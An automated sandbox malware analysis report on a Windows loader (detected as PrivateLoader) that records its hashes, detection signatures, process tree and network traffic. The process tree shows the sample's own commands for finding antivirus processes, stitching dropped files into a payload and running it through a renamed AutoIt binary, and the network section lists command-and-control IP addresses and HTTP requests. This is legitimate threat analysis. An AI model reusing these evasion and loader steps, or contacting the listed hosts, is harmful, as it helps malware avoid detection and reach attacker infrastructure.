
Windows Analysis Report
wWk9NkXYcL.exe

Overview

General Information

Sample name:wWk9NkXYcL.exe
renamed because original name is a hash value
Original sample name:3a1ccc44a0aa6f397c3b2eacf6d4c526.exe
Analysis ID:1510359
MD5:3a1ccc44a0aa6f397c3b2eacf6d4c526
SHA1:62d0b00435893cae171ddf6b2b5d964f608db84e
SHA256:e606e3e72dfaabb3b398d7f7b2b221675038da19080c69c41bd3005066d94f50
Tags:exe

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Sigma detected: Search for Antivirus process
Suricata IDS alerts for network traffic
AI detected suspicious sample
Drops PE files with a suspicious file extension
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Modifies the context of a thread in another process (thread injection)
Writes many files with high entropy
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found large amount of non-executed APIs
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
One or more processes crash
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Use Short Name Path in Command Line
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • wWk9NkXYcL.exe (PID: 3076 cmdline: "C:\Users\user\Desktop\wWk9NkXYcL.exe" MD5: 3A1CCC44A0AA6F397C3B2EACF6D4C526)
    • cmd.exe (PID: 2676 cmdline: "C:\Windows\System32\cmd.exe" /k move Emotions Emotions.cmd & Emotions.cmd & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 6412 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 7148 cmdline: findstr /I "wrsa.exe opssvc.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • tasklist.exe (PID: 564 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 3820 cmdline: findstr /I "avastui.exe avgui.exe bdservicehost.exe ekrn.exe nswscsvc.exe sophoshealth.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 5724 cmdline: cmd /c md 473638 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • findstr.exe (PID: 6752 cmdline: findstr /V "MaskBathroomCompositionInjection" Participants MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 5948 cmdline: cmd /c copy /b ..\They + ..\Florence + ..\Astrology + ..\Attributes + ..\Connect + ..\This + ..\Residents + ..\Staff + ..\Net + ..\Funded + ..\Laughing + ..\Reviewing + ..\Bullet + ..\Amendment + ..\Notre + ..\Beside + ..\Hc + ..\Heavily + ..\Spirit + ..\Contribution + ..\Dictionaries + ..\Simply + ..\Infants + ..\Music + ..\Right + ..\Fox + ..\Firewall + ..\Mint Q MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Element.pif (PID: 6444 cmdline: Element.pif Q MD5: C63860691927D62432750013B5A20F5F)
        • Element.pif (PID: 6196 cmdline: C:\Users\user~1\AppData\Local\Temp\473638\Element.pif MD5: C63860691927D62432750013B5A20F5F)
          • WerFault.exe (PID: 1964 cmdline: C:\Windows\system32\WerFault.exe -u -p 6196 -s 692 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
      • choice.exe (PID: 7040 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
  • cleanup
No configs have been found
No yara matches
Source: Process started; Author: Max Altgelt (Nextron Systems); Data: Command: Element.pif Q, CommandLine: Element.pif Q, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\473638\Element.pif, NewProcessName: C:\Users\user\AppData\Local\Temp\473638\Element.pif, OriginalFileName: C:\Users\user\AppData\Local\Temp\473638\Element.pif, ParentCommandLine: "C:\Windows\System32\cmd.exe" /k move Emotions Emotions.cmd & Emotions.cmd & exit, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 2676, ParentProcessName: cmd.exe, ProcessCommandLine: Element.pif Q, ProcessId: 6444, ProcessName: Element.pif
Source: Process started; Author: frack113, Nasreddine Bencherchali; Data: Command: C:\Users\user~1\AppData\Local\Temp\473638\Element.pif, CommandLine: C:\Users\user~1\AppData\Local\Temp\473638\Element.pif, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\473638\Element.pif, NewProcessName: C:\Users\user\AppData\Local\Temp\473638\Element.pif, OriginalFileName: C:\Users\user\AppData\Local\Temp\473638\Element.pif, ParentCommandLine: Element.pif Q, ParentImage: C:\Users\user\AppData\Local\Temp\473638\Element.pif, ParentProcessId: 6444, ParentProcessName: Element.pif, ProcessCommandLine: C:\Users\user~1\AppData\Local\Temp\473638\Element.pif, ProcessId: 6196, ProcessName: Element.pif

HIPS / PFW / Operating System Protection Evasion

Source: Process started; Author: Joe Security; Data: Command: findstr /I "avastui.exe avgui.exe bdservicehost.exe ekrn.exe nswscsvc.exe sophoshealth.exe" , CommandLine: findstr /I "avastui.exe avgui.exe bdservicehost.exe ekrn.exe nswscsvc.exe sophoshealth.exe" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /k move Emotions Emotions.cmd & Emotions.cmd & exit, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 2676, ParentProcessName: cmd.exe, ProcessCommandLine: findstr /I "avastui.exe avgui.exe bdservicehost.exe ekrn.exe nswscsvc.exe sophoshealth.exe" , ProcessId: 3820, ProcessName: findstr.exe

Timestamp                        SID      Severity  Classtype                      Source IP    Source Port  Destination IP  Destination Port  Protocol
2024-09-12T21:26:46.244720+0200  2054709  1         A Network Trojan was detected  192.168.2.7  49704        195.10.205.48   80                TCP
2024-09-12T21:26:54.244678+0200  2054709  1         A Network Trojan was detected  192.168.2.7  49705        193.233.232.86  80                TCP


AV Detection

Source: wWk9NkXYcL.exeAvira: detected
Source: http://195.10.205.48/api/crazyfish.phpAvira URL Cloud: Label: malware
Source: http://193.233.232.86/api/crazyfish.phpAvira URL Cloud: Label: malware
Source: wWk9NkXYcL.exeReversingLabs: Detection: 34%
Source: Submitted SampleIntegrated Neural Analysis Model: Matched 89.1% probability
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: 21_2_0000021925CE7440 CryptReleaseContext,21_2_0000021925CE7440
Source: wWk9NkXYcL.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\wWk9NkXYcL.exeCode function: 0_2_00405B98 FindFirstFileW,FindClose,0_2_00405B98
Source: C:\Users\user\Desktop\wWk9NkXYcL.exeCode function: 0_2_00406559 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406559
Source: C:\Users\user\Desktop\wWk9NkXYcL.exeCode function: 0_2_004029F1 FindFirstFileW,0_2_004029F1
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: 21_2_00007FF6C58ECE3C GetFileAttributesW,FindFirstFileW,FindClose,21_2_00007FF6C58ECE3C
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: 21_2_00007FF6C58B2DE0 FindFirstFileExW,21_2_00007FF6C58B2DE0
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user~1\AppData\Local\Temp\473638
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user~1\
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user~1\AppData\Local\Temp\473638\
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user~1\AppData\Local\Temp\
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user~1\AppData\Local\
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user~1\AppData\

Networking

Source: Network trafficSuricata IDS: 2054709 - Severity 1 - ET MALWARE PrivateLoader CnC Activity (GET) : 192.168.2.7:49705 -> 193.233.232.86:80
Source: Network trafficSuricata IDS: 2054709 - Severity 1 - ET MALWARE PrivateLoader CnC Activity (GET) : 192.168.2.7:49704 -> 195.10.205.48:80
Source: Joe Sandbox ViewIP Address: 195.10.205.48 195.10.205.48
Source: Joe Sandbox ViewASN Name: FREE-NET-ASFREEnetEU FREE-NET-ASFREEnetEU
Source: Joe Sandbox ViewASN Name: TSSCOM-ASRU TSSCOM-ASRU
Source: unknownDNS traffic detected: query: aSrgKXZxBg.aSrgKXZxBg replaycode: Name error (3)
Source: global trafficHTTP traffic detected:
  GET /api/crazyfish.php HTTP/1.1
  Connection: Keep-Alive
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Edg/127.0.0.0
  Host: 195.10.205.48
Source: global trafficHTTP traffic detected:
  GET /api/crazyfish.php HTTP/1.1
  Connection: Keep-Alive
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Edg/127.0.0.0
  Host: 193.233.232.86
Source: unknownTCP traffic detected without corresponding DNS query: 193.233.232.86
Source: unknownTCP traffic detected without corresponding DNS query: 193.233.232.86
Source: unknownTCP traffic detected without corresponding DNS query: 193.233.232.86
Source: unknownTCP traffic detected without corresponding DNS query: 193.233.232.86
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: wWk9NkXYcL.exeString found in binary or memory: talk: https://www.youtube.$ equals www.youtube.com (Youtube)
Source: global trafficDNS traffic detected: DNS query: aSrgKXZxBg.aSrgKXZxBg
Source: Element.pif, 00000015.00000002.2502705369.0000021925E58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.232.86/
Source: Element.pif, 00000015.00000002.2502705369.0000021925E58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.232.86/2%
Source: Element.pif, 00000015.00000002.2502705369.0000021925E58000.00000004.00000020.00020000.00000000.sdmp, Element.pif, 00000015.00000002.2502705369.0000021925EA2000.00000004.00000020.00020000.00000000.sdmp, Element.pif, 00000015.00000002.2502705369.0000021925E8E000.00000004.00000020.00020000.00000000.sdmp, Element.pif, 00000015.00000002.2502705369.0000021925E78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.232.86/api/crazyfish.php
Source: Element.pif, 00000015.00000002.2502705369.0000021925E58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.232.86/api/crazyfish.phpdll
Source: Element.pif, 00000015.00000002.2502705369.0000021925E61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.232.86:80/api/crazyfish.php1
Source: Element.pif, 00000015.00000002.2502705369.0000021925E58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://195.10.205.48/
Source: Element.pif, 00000015.00000002.2502705369.0000021925E58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://195.10.205.48/:%
Source: Element.pif, 00000015.00000002.2502705369.0000021925E38000.00000004.00000020.00020000.00000000.sdmp, Element.pif, 00000015.00000002.2502705369.0000021925E4E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://195.10.205.48/api/crazyfish.php
Source: Element.pif, 00000015.00000002.2502705369.0000021925E38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://195.10.205.48/api/crazyfish.php.A
Source: wWk9NkXYcL.exeString found in binary or memory: http://aia.entrust.net/evcs2-chain.p7c01
Source: wWk9NkXYcL.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: wWk9NkXYcL.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: wWk9NkXYcL.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: wWk9NkXYcL.exeString found in binary or memory: http://crl.entrust.net/csbr1.crl0
Source: wWk9NkXYcL.exeString found in binary or memory: http://crl.entrust.net/evcs2.crl0
Source: wWk9NkXYcL.exeString found in binary or memory: http://crl.entrust.net/g2ca.crl0
Source: wWk9NkXYcL.exe, 00000000.00000002.1252803341.000000000041E000.00000004.00000001.01000000.00000003.sdmp, Rick.0.dr, Element.pif.2.drString found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
Source: wWk9NkXYcL.exe, 00000000.00000002.1252803341.000000000041E000.00000004.00000001.01000000.00000003.sdmp, Rick.0.dr, Element.pif.2.drString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: wWk9NkXYcL.exe, 00000000.00000002.1252803341.000000000041E000.00000004.00000001.01000000.00000003.sdmp, Rick.0.dr, Element.pif.2.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: wWk9NkXYcL.exe, 00000000.00000002.1252803341.000000000041E000.00000004.00000001.01000000.00000003.sdmp, Rick.0.dr, Element.pif.2.drString found in binary or memory: http://crl.globalsign.net/root-r3.crl0
Source: wWk9NkXYcL.exeString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: wWk9NkXYcL.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: wWk9NkXYcL.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: wWk9NkXYcL.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: wWk9NkXYcL.exeString found in binary or memory: http://ocsp.digicert.com0A
Source: wWk9NkXYcL.exeString found in binary or memory: http://ocsp.digicert.com0C
Source: wWk9NkXYcL.exeString found in binary or memory: http://ocsp.digicert.com0X
Source: wWk9NkXYcL.exeString found in binary or memory: http://ocsp.entrust.net00
Source: wWk9NkXYcL.exeString found in binary or memory: http://ocsp.entrust.net01
Source: wWk9NkXYcL.exeString found in binary or memory: http://ocsp.entrust.net02
Source: wWk9NkXYcL.exe, 00000000.00000002.1252803341.000000000041E000.00000004.00000001.01000000.00000003.sdmp, Rick.0.dr, Element.pif.2.drString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: wWk9NkXYcL.exe, 00000000.00000002.1252803341.000000000041E000.00000004.00000001.01000000.00000003.sdmp, Rick.0.dr, Element.pif.2.drString found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
Source: wWk9NkXYcL.exe, 00000000.00000002.1252803341.000000000041E000.00000004.00000001.01000000.00000003.sdmp, Rick.0.dr, Element.pif.2.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: wWk9NkXYcL.exe, 00000000.00000002.1252803341.000000000041E000.00000004.00000001.01000000.00000003.sdmp, Rick.0.dr, Element.pif.2.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: wWk9NkXYcL.exe, 00000000.00000002.1252803341.000000000041E000.00000004.00000001.01000000.00000003.sdmp, Rick.0.dr, Element.pif.2.drString found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
Source: Element.pifString found in binary or memory: http://www.autoitscript.com/autoit3/
Source: Element.pif, 00000011.00000000.1272166025.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmp, Element.pif, 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmp, Rick.0.dr, Element.pif.2.drString found in binary or memory: http://www.autoitscript.com/autoit3/X
Source: wWk9NkXYcL.exeString found in binary or memory: http://www.entrust.net/rpa0
Source: wWk9NkXYcL.exeString found in binary or memory: http://www.entrust.net/rpa03
Source: wWk9NkXYcL.exeString found in binary or memory: http://www.w3.o
Source: Element.pif, 00000015.00000002.2501826641.0000021925C50000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://www.winimage.com/zLibDll
Source: wWk9NkXYcL.exeString found in binary or memory: https://fb.me/%3
Source: wWk9NkXYcL.exeString found in binary or memory: https://github.-
Source: wWk9NkXYcL.exeString found in binary or memory: https://github.-1
Source: wWk9NkXYcL.exeString found in binary or memory: https://github.-1/
Source: wWk9NkXYcL.exeString found in binary or memory: https://github./
Source: wWk9NkXYcL.exeString found in binary or memory: https://github./m
Source: wWk9NkXYcL.exeString found in binary or memory: https://github.2
Source: wWk9NkXYcL.exeString found in binary or memory: https://github.2&
Source: wWk9NkXYcL.exeString found in binary or memory: https://github.2C
Source: wWk9NkXYcL.exeString found in binary or memory: https://github.3
Source: wWk9NkXYcL.exeString found in binary or memory: https://github.c
Source: wWk9NkXYcL.exeString found in binary or memory: https://github.co(
Source: wWk9NkXYcL.exeString found in binary or memory: https://github.co.L
Source: wWk9NkXYcL.exeString found in binary or memory: https://github.com
Source: wWk9NkXYcL.exeString found in binary or memory: https://github.com/
Source: wWk9NkXYcL.exeString found in binary or memory: https://github.com4
Source: Element.pifString found in binary or memory: https://ipgeolocation.io/
Source: Element.pifString found in binary or memory: https://ipinfo.io/
Source: Element.pif, 00000015.00000002.2501826641.0000021925C50000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/https://ipgeolocation.io/0
Source: wWk9NkXYcL.exeString found in binary or memory: https://mdn.io//1
Source: wWk9NkXYcL.exe, 00000000.00000002.1252803341.000000000041E000.00000004.00000001.01000000.00000003.sdmp, Rick.0.dr, Element.pif.2.drString found in binary or memory: https://www.autoitscript.com/autoit3/
Source: Element.pif.2.drString found in binary or memory: https://www.globalsign.com/repository/0
Source: wWk9NkXYcL.exe, 00000000.00000002.1252803341.000000000041E000.00000004.00000001.01000000.00000003.sdmp, Rick.0.dr, Element.pif.2.drString found in binary or memory: https://www.globalsign.com/repository/06
Source: wWk9NkXYcL.exeString found in binary or memory: https://www.youtube.$
Source: C:\Users\user\Desktop\wWk9NkXYcL.exeCode function: 0_2_00404BB4 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00404BB4
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: 21_2_00007FF6C5871990 GetCursorPos,ScreenToClient,GetAsyncKeyState,GetAsyncKeyState,GetWindowLongW,21_2_00007FF6C5871990

Spam, unwanted Advertisements and Ransom Demands

Source: C:\Users\user\Desktop\wWk9NkXYcL.exeFile created: C:\Users\user\AppData\Local\Temp\Fox entropy: 7.99792455262
Source: C:\Users\user\Desktop\wWk9NkXYcL.exeFile created: C:\Users\user\AppData\Local\Temp\Residents entropy: 7.99769809583
Source: C:\Users\user\Desktop\wWk9NkXYcL.exeFile created: C:\Users\user\AppData\Local\Temp\Contribution entropy: 7.99686455583
Source: C:\Users\user\Desktop\wWk9NkXYcL.exeFile created: C:\Users\user\AppData\Local\Temp\Florence entropy: 7.99814599407
Source: C:\Users\user\Desktop\wWk9NkXYcL.exeFile created: C:\Users\user\AppData\Local\Temp\Firewall entropy: 7.99819147853
Source: C:\Users\user\Desktop\wWk9NkXYcL.exeFile created: C:\Users\user\AppData\Local\Temp\Heavily entropy: 7.99780337837
Source: C:\Users\user\Desktop\wWk9NkXYcL.exeFile created: C:\Users\user\AppData\Local\Temp\Simply entropy: 7.99793051262
Source: C:\Users\user\Desktop\wWk9NkXYcL.exeFile created: C:\Users\user\AppData\Local\Temp\Infants entropy: 7.99730862271
Source: C:\Users\user\Desktop\wWk9NkXYcL.exeFile created: C:\Users\user\AppData\Local\Temp\Hc entropy: 7.99760369602
Source: C:\Users\user\Desktop\wWk9NkXYcL.exeFile created: C:\Users\user\AppData\Local\Temp\Connect entropy: 7.99781393217
Source: C:\Users\user\Desktop\wWk9NkXYcL.exeFile created: C:\Users\user\AppData\Local\Temp\Dictionaries entropy: 7.99674242767
Source: C:\Users\user\Desktop\wWk9NkXYcL.exeFile created: C:\Users\user\AppData\Local\Temp\Notre entropy: 7.99750585679
Source: C:\Users\user\Desktop\wWk9NkXYcL.exeFile created: C:\Users\user\AppData\Local\Temp\This entropy: 7.9972677921
Source: C:\Users\user\Desktop\wWk9NkXYcL.exeFile created: C:\Users\user\AppData\Local\Temp\Bullet entropy: 7.99764561119
Source: C:\Users\user\Desktop\wWk9NkXYcL.exeFile created: C:\Users\user\AppData\Local\Temp\Attributes entropy: 7.99815557603
Source: C:\Users\user\Desktop\wWk9NkXYcL.exeFile created: C:\Users\user\AppData\Local\Temp\Reviewing entropy: 7.99662848474
Source: C:\Users\user\Desktop\wWk9NkXYcL.exeFile created: C:\Users\user\AppData\Local\Temp\Right entropy: 7.99726174006
Source: C:\Users\user\Desktop\wWk9NkXYcL.exeFile created: C:\Users\user\AppData\Local\Temp\Net entropy: 7.99704825667
Source: C:\Users\user\Desktop\wWk9NkXYcL.exeFile created: C:\Users\user\AppData\Local\Temp\Amendment entropy: 7.99767566571
Source: C:\Users\user\Desktop\wWk9NkXYcL.exeFile created: C:\Users\user\AppData\Local\Temp\Laughing entropy: 7.99805201402
Source: C:\Users\user\Desktop\wWk9NkXYcL.exeFile created: C:\Users\user\AppData\Local\Temp\Mint entropy: 7.99591090391
Source: C:\Users\user\Desktop\wWk9NkXYcL.exeFile created: C:\Users\user\AppData\Local\Temp\Funded entropy: 7.99648430627
Source: C:\Users\user\Desktop\wWk9NkXYcL.exeFile created: C:\Users\user\AppData\Local\Temp\Staff entropy: 7.99772745248
Source: C:\Users\user\Desktop\wWk9NkXYcL.exeFile created: C:\Users\user\AppData\Local\Temp\They entropy: 7.99664684989
Source: C:\Users\user\Desktop\wWk9NkXYcL.exeFile created: C:\Users\user\AppData\Local\Temp\Spirit entropy: 7.99749119583
Source: C:\Users\user\Desktop\wWk9NkXYcL.exeFile created: C:\Users\user\AppData\Local\Temp\Music entropy: 7.99813975886
Source: C:\Users\user\Desktop\wWk9NkXYcL.exeFile created: C:\Users\user\AppData\Local\Temp\Astrology entropy: 7.99776283032
Source: C:\Users\user\Desktop\wWk9NkXYcL.exeFile created: C:\Users\user\AppData\Local\Temp\Beside entropy: 7.99820881974
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\473638\Q entropy: 7.9999122724
Source: C:\Users\user\Desktop\wWk9NkXYcL.exeCode function: 0_2_00403415 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,0_2_00403415
Source: C:\Users\user\Desktop\wWk9NkXYcL.exeCode function: 0_2_0040447D0_2_0040447D
Source: C:\Users\user\Desktop\wWk9NkXYcL.exeCode function: 0_2_0040680A0_2_0040680A
Source: C:\Users\user\Desktop\wWk9NkXYcL.exeCode function: 0_2_00406E340_2_00406E34
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: 21_2_0000021925C730D021_2_0000021925C730D0
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: 21_2_0000021925C68CB021_2_0000021925C68CB0
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: 21_2_0000021925C6A4D021_2_0000021925C6A4D0
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: 21_2_0000021925C534D021_2_0000021925C534D0
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: 21_2_0000021925C6B42021_2_0000021925C6B420
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: 21_2_0000021925C703B021_2_0000021925C703B0
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: 21_2_0000021925D4533C21_2_0000021925D4533C
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: 21_2_0000021925D5831821_2_0000021925D58318
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: 21_2_0000021925D2C30021_2_0000021925D2C300
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: 21_2_0000021925C566C021_2_0000021925C566C0
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: 21_2_0000021925C6E5C021_2_0000021925C6E5C0
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: 21_2_0000021925C7354321_2_0000021925C73543
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: 21_2_0000021925C6850021_2_0000021925C68500
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: 21_2_0000021925D6E0C021_2_0000021925D6E0C0
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: 21_2_0000021925D440B421_2_0000021925D440B4
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: 21_2_0000021925D4B05021_2_0000021925D4B050
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: 21_2_0000021925D6E01821_2_0000021925D6E018
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: 21_2_0000021925D6E00821_2_0000021925D6E008
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: 21_2_0000021925C53FE921_2_0000021925C53FE9
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: 21_2_0000021925D52F6821_2_0000021925D52F68
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: 21_2_0000021925D44F3421_2_0000021925D44F34
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: 21_2_0000021925CE22C021_2_0000021925CE22C0
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: 21_2_0000021925D4620C21_2_0000021925D4620C
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: 21_2_0000021925D4513821_2_0000021925D45138
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: 21_2_0000021925C6DCD021_2_0000021925C6DCD0
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: 21_2_0000021925D4ECF821_2_0000021925D4ECF8
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: 21_2_0000021925D57C9821_2_0000021925D57C98
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: 21_2_0000021925C6CCA021_2_0000021925C6CCA0
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: 21_2_0000021925D4FBC821_2_0000021925D4FBC8
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: 21_2_0000021925C66B6021_2_0000021925C66B60
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: 21_2_0000021925C70B2021_2_0000021925C70B20
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: 21_2_0000021925C53E4B21_2_0000021925C53E4B
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: 21_2_0000021925C51E3021_2_0000021925C51E30
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: 21_2_0000021925D45D0421_2_0000021925D45D04
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: 21_2_0000021925C5C8E021_2_0000021925C5C8E0
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\473638\Element.pif 69D2F1718EA284829DDF8C1A0B39742AE59F2F21F152A664BAA01940EF43E353
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pif | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6196 -s 692
Source: wWk9NkXYcL.exe, 00000000.00000002.1253074310.00000000007DA000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameCmd.Exej% vs wWk9NkXYcL.exe
Source: wWk9NkXYcL.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: classification engine | Classification label: mal100.rans.evad.winEXE@25/34@1/2
